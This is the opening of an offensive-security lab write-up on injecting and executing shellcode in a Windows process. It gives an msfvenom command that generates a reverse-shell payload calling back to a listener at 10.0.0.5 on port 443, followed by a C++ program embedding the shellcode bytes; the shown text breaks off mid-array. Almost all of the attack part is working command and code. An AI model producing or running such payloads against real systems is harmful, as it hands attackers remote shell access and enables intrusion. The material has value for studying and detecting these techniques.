CreateRemoteThread Shellcode Injection

Injecting shellcode into a local process.

This lab explores some classic ways of injecting shellcode into a process memory and executing it.

Executing Shellcode in Local Process

First of - a simple test of how to execute the shellcode directly from a C++ program.

Generating shellcode for a reverse shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f c -b \x00\x0a\x0d

C++ code to injectd and invoke the shellcode:

inject-local-process.cpp
#include "stdafx.h"
#include "Windows.h"

int main()
{
	unsigned char shellcode[] =
		"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
		"\xff\xff\x48\xbb\x1d\xbe\xa2\x7b\x2b\x90\xe1\xec\x48\x31\x58"
		"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xe1\xf6\x21\x9f\xdb\x78"
		"\x21\xec\x1d\xbe\xe3\x2a\x6